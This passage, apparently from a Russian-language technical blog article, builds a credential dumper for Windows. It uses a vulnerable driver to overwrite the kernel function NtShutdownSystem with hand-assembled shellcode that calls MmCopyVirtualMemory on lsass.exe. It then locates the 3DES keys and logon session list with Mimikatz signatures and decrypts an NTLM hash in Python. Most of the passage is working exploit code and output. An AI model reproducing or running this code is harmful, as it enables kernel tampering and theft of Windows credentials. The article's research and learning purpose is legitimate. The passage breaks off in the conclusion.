\u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0438\u0434\u0435\u0435\u0439 \u0438\u0437 \u0432\u0442\u043e\u0440\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0438. \u0412 \u043d\u0435\u0439 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f, \u0447\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c API \u0444\u0443\u043d\u043a\u0446\u0438\u044e <a href=\"http:\/\/undocumented.ntinternals.net\/index.html?page=UserMode%2FUndocumented%20Functions%2FHardware%2FNtShutdownSystem.html\">NtShutdownSystem<\/a> \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u0443\u044e \u0432 Ntoskrnl.exe (\u044f\u0434\u0440\u043e \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows NT) \u043d\u0430 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 shellcode \u0438 \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u044d\u0442\u0443 (\u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u0443\u044e) \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0438\u0437 ntdll.dll (\u0434\u0438\u043d\u0430\u043c\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0435\u043c\u0430\u044f \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430, \u0441\u043b\u0443\u0436\u0430\u0449\u0430\u044f \u043f\u0440\u043e\u0441\u043b\u043e\u0439\u043a\u043e\u0439 \u043c\u0435\u0436\u0434\u0443 API \u0438 NT API), \u0447\u0442\u043e\u0431\u044b shellcode \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b\u0441\u044f \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 kernel-mode.<\/p>\n<p>\u0421\u0443\u0442\u044c shellcode\u2019\u0430 \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043d\u0435\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e MmCopyVirtualMemory, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043a\u0430\u043a \u0440\u0430\u0437 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442 \u0438\u0437\u0432\u043b\u0435\u0447\u044c \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u0438\u0437 lsass.exe \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u043e\u0439 \u0432 user-mode. <\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"530\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/285\/79a\/6fd\/28579a6fd7b4b36da1228ceb0cff61a0.png\" data-width=\"1275\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0439 shellcode \u0431\u0443\u0434\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c: <\/p>\n<p>\u0421\u043f\u0435\u0440\u0432\u0430 \u044f \u0432\u044b\u0434\u0435\u043b\u044f\u044e \u0443\u0447\u0430\u0441\u0442\u043e\u043a \u043f\u0430\u043c\u044f\u0442\u0438 \u0434\u043b\u044f \u0432\u044b\u0437\u043e\u0432\u0430 \u043d\u0435\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MmCopyVirtualMemory.<br \/>\u041a\u043e\u0434 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u0438:<\/p>\n<pre><code class=\"cpp\">DWORD64 GetAllocateAddress(HANDLE hDevice, ULONG64 ExAllocatePool, ULONG64 NtShutdownSystem, ULONG64 addr_NtShutdownSystem_ntdll) {  DWORD64 AddressAllocate = 0;  char rawAllocate[44]; \/\/ \u0432\u044b\u0434\u0435\u043b\u044f\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043f\u043e\u0434 shellcode \/\/ char prologue[7] = { 0xCC, 0xCC, 0xCC,0x55,0x48,0x89,0xe5 }; char prologue[4] = {0x55,0x48,0x89,0xe5 };  \/\/prologue memmove(rawAllocate, prologue, 4);  char NumberoFBytes_mov_rdx[2] = { 0x48,0xBA }; \/\/ rdx NumberoFBytes memmove(rawAllocate + 4, NumberoFBytes_mov_rdx, 2);  DWORD64 NumberoFBytes_mov_data = 0x200; memmove(rawAllocate + 6, (char*)&amp;NumberoFBytes_mov_data, 8);  char PoolType_mov_rcx[3] = { 0x48,0x33,0xc9 }; \/\/ rcx PoolType memmove(rawAllocate + 14, PoolType_mov_rcx, 3);  char calladdress_mov_rax[2] = { 0x48,0xb8 }; \/\/ call address memmove(rawAllocate + 17, calladdress_mov_rax, 2);  DWORD64 calladdress_mov_data = ExAllocatePool; memmove(rawAllocate + 19, (char*)&amp;calladdress_mov_data, 8);  char call_rax[2] = { 0xff,0xd0 }; memmove(rawAllocate + 27, call_rax, 2);  char get_rax_mov[2] = { 0x48,0xa3 };  \/\/ get rax memmove(rawAllocate + 29, get_rax_mov, 2);  DWORD64 get_rax_data = (DWORD64)&amp;AddressAllocate; memmove(rawAllocate + 31, (char*)&amp;get_rax_data, 8);  char epilogue[4] = { 0x48,0x89,0xec,0x5d };  \/\/epilogue memmove(rawAllocate + 39, epilogue, 4);  char ret[1] = { 0xC3 }; \/\/ret  memmove(rawAllocate + 43, ret, 1);  intel::MemCopy(hDevice, (uint64_t)NtShutdownSystem, (uint64_t)rawAllocate, 44); \/\/34  NTSHUTDOWNSYSTEM fNtShutdownSystem = (NTSHUTDOWNSYSTEM)addr_NtShutdownSystem_ntdll; fNtShutdownSystem(ShutdownPowerOff); return AddressAllocate; } <\/code><\/pre>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"326\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/215\/080\/303\/21508030372d86292d1cc31d614d0e0d.png\" data-width=\"995\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0414\u0430\u043b\u044c\u0448\u0435, \u044f \u0438\u0437\u043c\u0435\u043d\u044e NtShutdownSystem \u0442\u0430\u043a, \u0447\u0442\u043e\u0431\u044b \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u0442\u044c \u043f\u0435\u0440\u0435\u0445\u043e\u0434 \u043d\u0430 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0439 \u0443\u0447\u0430\u0441\u0442\u043e\u043a \u043f\u0430\u043c\u044f\u0442\u0438.<br \/>\u041a\u043e\u0434 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0430:<\/p>\n<pre><code class=\"cpp\">void CallAllocateAddress(HANDLE hDevice, ULONG64 ExAllocatePool, ULONG64 NtShutdownSystem, ULONG64 addr_NtShutdownSystem_ntdll, DWORD64 AddressAllocate) {  char rawCallAllocate[24]; char prologue[7] = { 0xCC, 0xCC, 0xCC,0x55,0x48,0x89,0xe5 }; \/\/char prologue[4] = {0x55,0x48,0x89,0xe5 };  \/\/prologue memmove(rawCallAllocate, prologue, 7);  char Allocate_mov_rax[2] = { 0x48,0xa1 }; \/\/  memmove(rawCallAllocate + 7, Allocate_mov_rax, 2);  DWORD64 Allocate_mov_data = (DWORD64)&amp;AddressAllocate; memmove(rawCallAllocate + 9, (char*)&amp;Allocate_mov_data, 8);  char calladdress_rax[2] = { 0xff,0xd0 }; \/\/ call address memmove(rawCallAllocate + 17, calladdress_rax, 2);  char epilogue[4] = { 0x48,0x89,0xec,0x5d };  \/\/epilogue memmove(rawCallAllocate + 19, epilogue, 4);  char ret[1] = { 0xC3 }; \/\/ret  memmove(rawCallAllocate + 23, ret, 1);  intel::MemCopy(hDevice, (uint64_t)NtShutdownSystem, (uint64_t)rawCallAllocate, 24); \/\/34 }<\/code><\/pre>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"306\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/3f7\/d41\/966\/3f7d41966cfc425266f8293bb429056c.png\" data-width=\"970\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0410 \u0432 \u0432\u044b\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0439 \u0443\u0447\u0430\u0441\u0442\u043e\u043a \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u043e\u043c\u0435\u0449\u0430\u044e shellcode, \u0434\u043b\u044f \u0432\u044b\u0437\u043e\u0432\u0430 \u043d\u0435\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MmCopyVirtualMemory.<br \/>\u041a\u043e\u0434 \u0432\u044b\u0437\u043e\u0432\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MmCopyVirtualMemory:<\/p>\n<pre><code class=\"cpp\">char rawData[96];  char prologue[4] = { 0x55,0x48,0x89,0xe5 };  \/\/prologue memmove(rawData, prologue, 4);  char result_mov_rax[2] = { 0x48,0xb8 };  \/\/push result memmove(rawData + 4, result_mov_rax, 2);  DWORD64  result_mov_data = (DWORD64)&amp;Result; memmove(rawData + 6, (char*)&amp;result_mov_data, 8);  char push_rsp_30[5] = { 0x48,0x89,0x44,0x24,0x30 }; memmove(rawData + 14, push_rsp_30, 5);  char push_rsp_28[5] = { 0xC6,0x44,0x24,0x28,0x00 };  \/\/ \/\/ push kernel mode memmove(rawData + 19, push_rsp_28, 5);  char size_mov_rax[2] = { 0x48,0xb8 }; \/\/ push size to  memmove(rawData + 24, size_mov_rax, 2);  DWORD64 size_mov_data = Size; memmove(rawData + 26, (char*)&amp;size_mov_data, 8);  char push_rsp_20[5] = { 0x48,0x89,0x44,0x24,0x20 }; memmove(rawData + 34, push_rsp_20, 5);  char targetaddress_mov_r9[2] = { 0x49,0xb9 }; \/\/ r9 targetaddress memmove(rawData + 39, targetaddress_mov_r9, 2);  DWORD64 targetaddress_mov_data = (DWORD64)&amp;targetaddress; memmove(rawData + 41, (char*)targetaddress_mov_data, 8);  char targetProcess_mov_r8[2] = { 0x49,0xb8 }; \/\/ r8 targetProcess memmove(rawData + 49, targetProcess_mov_r8, 2);  DWORD64 targetProcess_mov_data = targetProcess; memmove(rawData + 51, (char*)&amp;targetProcess_mov_data, 8);  char sourseaddress_mov_rdx[2] = { 0x48,0xBA }; \/\/ rdx sourseaddress memmove(rawData + 59, sourseaddress_mov_rdx, 2);  DWORD64 sourseaddress_mov_data = sourseaddress; memmove(rawData + 61, (char*)&amp;sourseaddress_mov_data, 8);  char sourseProcess_mov_rcx[2] = { 0x48,0xb9 }; \/\/ rcx sourseProcess memmove(rawData + 69, sourseProcess_mov_rcx, 2);  DWORD64 sourseProcess_mov_data = sourseProcess; memmove(rawData + 71, (char*)&amp;sourseProcess_mov_data, 8);  char calladdress_mov_rax[2] = { 0x48,0xb8 }; \/\/ call address memmove(rawData + 79, calladdress_mov_rax, 2);  DWORD64 calladdress_mov_data = MmCopyVirtualMemory; memmove(rawData + 81, (char*)&amp;calladdress_mov_data, 8);  char call_rax[2] = { 0xff,0xd0 }; memmove(rawData + 89, call_rax, 2);  char epilogue[4] = { 0x48,0x89,0xec,0x5d };  \/\/epilogue memmove(rawData + 91, epilogue, 4);  char ret[1] = { 0xC3 }; \/\/ret  memmove(rawData + 95, ret, 1);  intel::MemCopy(hDevice, (uint64_t)AddressAllocate, (uint64_t)rawData, 96); \/\/96  NTSHUTDOWNSYSTEM fNtShutdownSystem = (NTSHUTDOWNSYSTEM)addr_NtShutdownSystem_ntdll; DWORD64 Allocate = fNtShutdownSystem(ShutdownPowerOff); <\/code><\/pre>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"343\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/bd7\/a6d\/ed6\/bd7a6ded6f1be83d06cf7d73a032b517.png\" data-width=\"953\"\/><figcaption><\/figcaption><\/figure>\n<h2>5. \u0418\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0435 NTLM hash \u0438\u0437 lsass.exe.<\/h2>\n<p>\u0420\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f \u043c\u0435\u0442\u043e\u0434\u0430 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM hash \u0438\u0437 lsass.exe \u0432\u0437\u044f\u0442\u0430 \u0438\u0437 \u043f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0438. \u0412 \u043d\u0435\u0439 \u0441\u043a\u0430\u0437\u0430\u043d\u043e, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u0435\u0442\u043e\u0434 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u043f\u043e \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0438 \u0441 <a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\">Mimikatz<\/a> (sekurlsa::msv), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0432\u0437\u044f\u0442 \u0438\u0437\u00a0 \u0441\u0442\u0430\u0442\u044c\u0438 \u201c<a href=\"https:\/\/www.matteomalvica.com\/blog\/2020\/01\/20\/mimikatz-lsass-dump-windg-pykd\/\">Uncovering Mimikatz \u2018msv\u2019 and collecting credentials through PyKD<\/a>\u201d \u043e\u0442 Matteo Malvica.   <\/p>\n<p>\u041a\u043e\u0434 \u043f\u043e\u0438\u0441\u043a\u0430 NTLM hash:<\/p>\n<pre><code class=\"cpp\">void lootLsaSrv(HANDLE hDevice, ULONG64 EPROCESS_lssas, ULONG64 Start, ULONG64 End, ULONG64 Size, ULONG64 EPROCESS_GetProcess) { \/\/(char* start, ULONGLONG original, ULONGLONG size) { LARGE_INTEGER reader; DWORD bytes_read = 0; LPSTR lsasrv = NULL; ULONGLONG cursor = 0; ULONGLONG lsasrv_size = 0; ULONGLONG original = 0; BOOL result;   ULONGLONG LogonSessionListCount = 0; ULONGLONG LogonSessionList = 0; ULONGLONG LogonSessionList_offset = 0; ULONGLONG LogonSessionListCount_offset = 0; ULONGLONG iv_offset = 0; ULONGLONG hDes_offset = 0; ULONGLONG DES_pointer = 0;  unsigned char* iv_vector = NULL; unsigned char* DES_key = NULL; KIWI_BCRYPT_HANDLE_KEY h3DesKey; KIWI_BCRYPT_KEY81 extracted3DesKey;  LSAINITIALIZE_NEEDLE LsaInitialize_needle = { 0x83, 0x64, 0x24, 0x30, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x44, 0x8b, 0x4d, 0xd8, 0x48, 0x8d, 0x15 }; LOGONSESSIONLIST_NEEDLE LogonSessionList_needle = { 0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74 };  PBYTE LsaInitialize_needle_buffer = NULL; PBYTE needle_buffer = NULL;  int offset_LsaInitialize_needle = 0; int offset_LogonSessionList_needle = 0;  ULONGLONG currentElem = 0;  original = (DWORD64)Start;  \/* Save the whole region in a buffer *\/ lsasrv = (LPSTR)malloc(Size); lsasrv = (LPSTR)dumpUsermode(hDevice, EPROCESS_lssas, Start, (End - Start), EPROCESS_GetProcess); lsasrv_size = Size;  \/\/ Use mimikatz signatures to find the IV\/keys printf(\"\\t\\t===================[Crypto info]===================\\n\"); LsaInitialize_needle_buffer = (PBYTE)malloc(sizeof(LSAINITIALIZE_NEEDLE)); memcpy(LsaInitialize_needle_buffer, &amp;LsaInitialize_needle, sizeof(LSAINITIALIZE_NEEDLE)); offset_LsaInitialize_needle = memmem((PBYTE)lsasrv, lsasrv_size, LsaInitialize_needle_buffer, sizeof(LSAINITIALIZE_NEEDLE)); printf(\"[*] Offset for InitializationVector\/h3DesKey\/hAesKey is %d\\n\", offset_LsaInitialize_needle);  memcpy(&amp;iv_offset, lsasrv + offset_LsaInitialize_needle + 0x43, 4);  \/\/IV offset printf(\"[*] IV Vector relative offset: 0x%08llx\\n\", iv_offset); iv_vector = (unsigned char*)malloc(16); memcpy(iv_vector, lsasrv + offset_LsaInitialize_needle + 0x43 + 4 + iv_offset, 16); printf(\"\\t\\t[\/!\\\\] IV Vector: \"); for (int i = 0; i &lt; 16; i++) { printf(\"%02x\", iv_vector[i]); } printf(\" [\/!\\\\]\\n\"); free(iv_vector);  memcpy(&amp;hDes_offset, lsasrv + offset_LsaInitialize_needle - 0x59, 4); \/\/DES KEY offset printf(\"[*] 3DES Handle Key relative offset: 0x%08llx\\n\", hDes_offset); printf(\"[*]0x%08llx\\n\", (original + offset_LsaInitialize_needle - 0x59 + 4 + hDes_offset)); memcpy(&amp;DES_pointer, lsasrv + offset_LsaInitialize_needle - 0x59 + 4 + hDes_offset, 8); printf(\"[*] 3DES Handle Key pointer: 0x%08llx\\n\", DES_pointer);  LPSTR h3DesKey_tmp = (LPSTR)malloc(sizeof(KIWI_BCRYPT_HANDLE_KEY)); h3DesKey_tmp = dumpUsermode(hDevice, EPROCESS_lssas, DES_pointer, sizeof(KIWI_BCRYPT_HANDLE_KEY), EPROCESS_GetProcess); memcpy(&amp;h3DesKey, h3DesKey_tmp, sizeof(KIWI_BCRYPT_HANDLE_KEY)); free(h3DesKey_tmp);  LPSTR h3DesKey_key_tmp = (LPSTR)malloc(sizeof(KIWI_BCRYPT_KEY81)); h3DesKey_key_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)h3DesKey.key, sizeof(KIWI_BCRYPT_KEY81), EPROCESS_GetProcess); memcpy(&amp;extracted3DesKey, h3DesKey_key_tmp, sizeof(KIWI_BCRYPT_KEY81)); free(h3DesKey_key_tmp); DES_key = (unsigned char*)malloc(extracted3DesKey.hardkey.cbSecret); memcpy(DES_key, extracted3DesKey.hardkey.data, extracted3DesKey.hardkey.cbSecret); printf(\"\\t\\t[\/!\\\\] 3DES Key: \"); for (int i = 0; i &lt; extracted3DesKey.hardkey.cbSecret; i++) { printf(\"%02x\", DES_key[i]); } printf(\" [\/!\\\\]\\n\"); free(DES_key); printf(\"\\t\\t================================================\\n\");  needle_buffer = (PBYTE)malloc(sizeof(LOGONSESSIONLIST_NEEDLE)); memcpy(needle_buffer, &amp;LogonSessionList_needle, sizeof(LOGONSESSIONLIST_NEEDLE)); offset_LogonSessionList_needle = memmem((PBYTE)lsasrv, lsasrv_size, needle_buffer, sizeof(LOGONSESSIONLIST_NEEDLE));  memcpy(&amp;LogonSessionList_offset, lsasrv + offset_LogonSessionList_needle + 0x17, 4); printf(\"[*] LogonSessionList Relative Offset: 0x%08llx\\n\", LogonSessionList_offset);  LogonSessionList = original + offset_LogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset; printf(\"[*] LogonSessionList: 0x%08llx\\n\", LogonSessionList);  printf(\"\\t\\t===================[LogonSessionList]===================\"); while (currentElem != LogonSessionList) { if (currentElem == 0) { currentElem = LogonSessionList; } memcpy(&amp;currentElem, lsasrv + offset_LogonSessionList_needle + 0x17 + 4 + LogonSessionList_offset, 8); printf(\"Element at: 0x%08llx\\n\", currentElem); LPSTR currentElem_tmp = (LPSTR)malloc(sizeof(KIWI_BCRYPT_KEY81)); currentElem_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)currentElem, sizeof(currentElem), EPROCESS_GetProcess); memcpy(&amp;currentElem, currentElem_tmp, sizeof(currentElem_tmp)); free(currentElem_tmp); USHORT length = 0; LPWSTR username = NULL; ULONGLONG username_pointer = 0;  LPSTR length_tmp = (LPSTR)malloc(sizeof(length)); length_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)currentElem + 0x90, sizeof(length), EPROCESS_GetProcess); memcpy(&amp;length, length_tmp, sizeof(length_tmp)); free(length_tmp);  username = (LPWSTR)malloc(length + 2); memset(username, 0, length + 2);  LPSTR username_pointer_tmp = (LPSTR)malloc(sizeof(username_pointer)); username_pointer_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)currentElem + 0x98, sizeof(username_pointer), EPROCESS_GetProcess); memcpy(&amp;username_pointer, username_pointer_tmp, sizeof(username_pointer_tmp)); free(username_pointer_tmp);  LPSTR username_tmp = (LPSTR)malloc(sizeof(username)); username_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)username_pointer, sizeof(username), EPROCESS_GetProcess); memcpy(username, username_tmp, sizeof(username_tmp)); free(username_tmp); wprintf(L\"\\n[+] Username: %s \\n\", username); free(username);   ULONGLONG credentials_pointer = 0; LPSTR credentials_pointer_tmp = (LPSTR)malloc(sizeof(credentials_pointer)); credentials_pointer_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)currentElem + 0x108, sizeof(credentials_pointer), EPROCESS_GetProcess); memcpy(&amp;credentials_pointer, credentials_pointer_tmp, sizeof(credentials_pointer_tmp)); free(credentials_pointer_tmp);  if (credentials_pointer == 0) { printf(\"[+] Cryptoblob: (empty)\\n\"); continue; } printf(\"[*] Credentials Pointer: 0x%08llx\\n\", credentials_pointer);  ULONGLONG primaryCredentials_pointer = 0; LPSTR primaryCredentials_pointer_tmp = (LPSTR)malloc(sizeof(primaryCredentials_pointer)); primaryCredentials_pointer_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)credentials_pointer + 0x10, sizeof(primaryCredentials_pointer), EPROCESS_GetProcess); memcpy(&amp;primaryCredentials_pointer, primaryCredentials_pointer_tmp, sizeof(primaryCredentials_pointer_tmp)); free(primaryCredentials_pointer_tmp); printf(\"[*] Primary credentials Pointer: 0x%08llx\\n\", primaryCredentials_pointer);  USHORT cryptoblob_size = 0; LPSTR cryptoblob_size_tmp = (LPSTR)malloc(sizeof(cryptoblob_size)); cryptoblob_size_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)primaryCredentials_pointer + 0x18, sizeof(cryptoblob_size), EPROCESS_GetProcess); memcpy(&amp;cryptoblob_size, cryptoblob_size_tmp, sizeof(cryptoblob_size_tmp)); free(cryptoblob_size_tmp); if (cryptoblob_size % 8 != 0) { printf(\"[*] Cryptoblob size: (not compatible with 3DEs, skipping...)\\n\"); continue; } printf(\"[*] Cryptoblob size: 0x%x\\n\", cryptoblob_size);  ULONGLONG cryptoblob_pointer = 0; LPSTR cryptoblob_pointer_tmp = (LPSTR)malloc(sizeof(cryptoblob_pointer)); cryptoblob_pointer_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)primaryCredentials_pointer + 0x20, sizeof(cryptoblob_pointer), EPROCESS_GetProcess); memcpy(&amp;cryptoblob_pointer, cryptoblob_pointer_tmp, sizeof(cryptoblob_pointer_tmp)); free(cryptoblob_pointer_tmp); printf(\"Cryptoblob pointer: 0x%08llx\\n\", cryptoblob_pointer);  unsigned char* cryptoblob = (unsigned char*)malloc(cryptoblob_size); LPSTR cryptoblob_tmp = (LPSTR)malloc(cryptoblob_size); cryptoblob_tmp = dumpUsermode(hDevice, EPROCESS_lssas, (DWORD64)cryptoblob_pointer, cryptoblob_size, EPROCESS_GetProcess); memcpy(cryptoblob, cryptoblob_tmp, cryptoblob_size);  printf(\"[+] Cryptoblob:\\n\"); for (int i = 0; i &lt; cryptoblob_size; i++) { printf(\"%02x\", cryptoblob[i]); } printf(\"\\n\"); free(cryptoblob_tmp); break; }  printf(\"\\t\\t================================================\\n\"); free(needle_buffer); free(lsasrv); } <\/code><\/pre>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442:   <\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"635\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/c6a\/97c\/63a\/c6a97c63a66dc562d6236fddef5bb763.png\" data-width=\"1252\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0418 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u0443\u044e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e python:   <\/p>\n<pre><code class=\"python\">from pyDes import * k = triple_des(\"221f62e7c7d8e10d612095a6ab610bc2436644180f7274b2\".decode(\"hex\"), CBC, \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\") print k.decrypt(\"946854293e1be6cd0502e252a2c427e6065d458c4b2bfe3b5c4b79d700308ab52a5fe373e00d60dfc3627d776f0ebc31f82a5f02b276551eee697ee485626c8858bfdefd67854ff63029ae418855502be06c4c70072772e26b89d7d971ca17b2a5c360130e954f1606b5088297e7dd7b570988b2fb1cf79ce7fd7cd3647392bb165858c81f44f1099664436aa19ed429657fb57f5da7b169d3df91b85ccf8b32e600e0f80debcbc4fc9f355e8f60881f419895bf1589cdb7e9ed44ddc27fcd8e03c815974b405d13f4de760c00d7f159503c75de9ba39d34752bcdc30d72413e9b6e944201c1b84d7b43a1f09821924aab0114a33ca7b0aa59692f67acfe2d1ea7489bda821c921465b5969220e027d51a726486be01d76220f7b870fb3f7c6dd004dc573b2b3f40c80ae7c59461e50f1b08fe42cead0ca77dae19099c9cfa933bff932a3767098084476e4340cd1e99cd65d593c6c1653458b3d3c99078c543a30749d4cffec77c9c350c10be7963112708112b1a9adc729bf92ab8068d740796393d562595a00a9e31975952139df37c9dce429f3eeeeb29d8533bad0eb17832e42407f5b59c65\".decode(\"hex\"))[74:90].encode(\"hex\")<\/code><\/pre>\n<p>NTLM hash: <strong>c377ba8a4dd52401bc404dbe49771bbc<\/strong><\/p>\n<p>\u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c \u0448\u0430\u0433\u043e\u043c \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Mimikatz NTLM hash \u0438 \u0441\u0432\u0435\u0440\u0438\u0442\u044c \u0435\u0433\u043e \u0441 \u043d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u043c \u043c\u043d\u043e\u0439 NTLM hash\u2019\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u0443\u0434\u043e\u0441\u0442\u043e\u0432\u0435\u0440\u0438\u0442\u0441\u044f \u0432 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f (shor.exe).<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"387\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/407\/c06\/c0e\/407c06c0e9ec016d55cd9d17f4ec0151.png\" data-width=\"556\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041d\u0430\u0439\u0434\u0435\u043d\u043d\u044b\u0439 \u043c\u043d\u043e\u0439 NTLM hash \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0435\u0442 \u0441 NTLM hash\u2019\u043e\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b Mimikatz.<\/p>\n<h2>\u0412\u044b\u0432\u043e\u0434.<\/h2>\n<p>\u041f\u043e\u0434\u0432\u043e\u0434\u044f \u0438\u0442\u043e\u0433\u0438, \u0445\u043e\u0447\u0443 \u0441\u043a\u0430\u0437\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u0431\u044b\u043b \u0432\u0435\u0441\u044c\u043c\u0430 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043e\u043f\u044b\u0442, \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u043c\u0443 \u044f \u043f\u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043b\u0441\u044f \u0441 \u043f\u0440\u043e\u0435\u043a\u0442\u043e\u043c KDU, 